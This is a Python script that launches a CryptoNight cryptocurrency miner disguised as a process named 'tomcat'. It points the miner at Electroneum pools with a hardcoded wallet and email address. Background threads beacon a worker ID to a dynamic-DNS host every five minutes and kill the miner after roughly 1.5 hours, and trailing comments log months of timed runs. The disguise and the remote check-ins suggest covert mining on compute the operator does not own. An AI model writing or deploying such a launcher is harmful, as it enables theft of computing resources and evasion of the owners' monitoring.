import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:32:03.693775
#2018-02-17 17:20:04.201174
#2018-02-17 19:07:07.071707
#2018-02-17 20:54:07.230668
#2018-02-17 22:41:01.821669
#2018-02-18 00:25:04.051398
#2018-02-18 02:16:05.180921
#2018-02-18 04:03:02.250101
#2018-02-18 05:52:04.457699
#2018-02-18 07:43:04.073182
#2018-02-18 09:31:05.144756
#2018-02-18 11:17:03.291827
#2018-02-18 13:03:05.588228
#2018-02-18 14:51:05.813988
#2018-02-18 16:38:04.951831
#2018-02-18 18:26:07.720362
#2018-02-18 20:13:04.566912
#2018-02-18 21:58:05.780015
#2018-02-18 23:47:01.478214
#2018-02-19 01:33:07.082362
#2018-02-19 03:21:05.069774
#2018-02-19 05:06:06.292428
#2018-02-19 06:53:03.067783
#2018-02-19 08:43:04.393967
#2018-02-19 10:32:05.136951
#2018-02-19 12:20:01.672671
#2018-02-19 14:07:07.034639
#2018-02-19 15:56:06.528010
#2018-02-19 17:46:05.983008
#2018-02-19 19:31:02.080316
#2018-02-19 21:18:04.091971
#2018-02-19 23:03:06.657646
#2018-02-20 00:46:04.407477
#2018-02-20 02:36:04.059370
#2018-02-20 04:25:07.288527
#2018-02-20 06:10:08.978265
#2018-02-20 07:55:05.374760
#2018-02-20 09:40:06.509120
#2018-02-20 11:24:04.889864
#2018-02-20 13:10:03.135307
#2018-02-20 14:54:05.370197
#2018-02-20 16:40:08.971847
#2018-02-20 18:27:02.185112
#2018-02-20 20:18:08.456846
#2018-02-20 22:05:07.233791
#2018-02-20 23:46:05.748564
#2018-02-21 01:33:06.794948
#2018-02-21 03:20:03.118687
#2018-02-21 05:09:04.056713
#2018-02-21 06:57:07.409199
#2018-02-21 08:43:05.380644
#2018-02-21 10:28:07.510922
#2018-02-21 12:16:04.366162
#2018-02-21 14:04:01.848007
#2018-02-21 15:48:01.696115
#2018-02-21 17:41:08.871234
#2018-02-21 19:27:02.133833
#2018-02-21 21:15:04.728812
#2018-02-21 23:03:04.678473
#2018-02-22 00:52:07.025170
#2018-02-22 02:39:05.974813
#2018-02-22 04:24:07.543010
#2018-02-22 06:10:01.562143
#2018-02-22 07:56:03.843697
#2018-02-22 09:45:10.535100
#2018-02-22 11:29:08.614314
#2018-02-22 13:17:06.747611
#2018-02-22 15:06:06.331802
#2018-02-22 16:49:06.292555
#2018-02-22 18:37:08.033704
#2018-02-22 20:29:01.671747
#2018-02-22 22:14:07.981594
#2018-02-23 00:03:01.660371
#2018-02-23 01:51:07.998911
#2018-02-23 03:39:04.154246
#2018-02-23 05:24:04.875659
#2018-02-23 07:09:05.269280
#2018-02-23 08:59:03.838939
#2018-02-23 11:04:09.354085
#2018-02-23 12:59:05.220062
#2018-02-23 14:45:03.052453
#2018-02-23 16:35:09.775957
#2018-02-23 18:23:08.694551
#2018-02-23 20:09:04.263244
#2018-02-23 21:58:06.564108
#2018-02-23 23:45:09.094274
#2018-02-24 01:37:07.144587
#2018-02-24 03:27:07.845191
#2018-02-24 05:12:02.284420
#2018-02-24 07:00:10.100531
#2018-02-24 08:51:03.693951
#2018-02-24 10:49:05.397944
#2018-02-24 12:37:01.848322
#2018-02-24 14:25:07.358249
#2018-02-24 16:13:01.304621
#2018-02-24 18:06:07.105792
#2018-02-24 19:52:04.223344
#2018-02-24 21:36:07.467510
#2018-02-25 01:57:05.971460
#2018-02-25 05:47:06.802881
#2018-02-25 11:37:04.449769